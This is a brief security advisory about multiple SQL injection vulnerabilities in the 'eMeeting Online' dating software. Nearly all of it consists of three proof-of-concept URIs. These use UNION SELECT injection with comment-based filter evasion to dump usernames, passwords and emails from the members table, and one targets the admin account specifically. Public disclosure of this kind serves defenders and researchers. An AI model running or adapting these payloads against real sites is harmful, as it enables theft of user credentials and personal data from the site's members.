Dating Software eMeeting Online Multiple SQL Injection Vulnerabilities

Dating Software eMeeting Online Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/*
http://www.example.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/**/where/**/username=0x61646D696E/*
http://www.example.com/account/gallery.php?p=gal&id=-1/**/UNION/**/ALL/**/SELECT/**/null,null,null,concat(0x273e3c2f74643e,username,0x3a,password,0x3a,email,0x3c62723e3c2f2f),null,null/**/from/**/members/*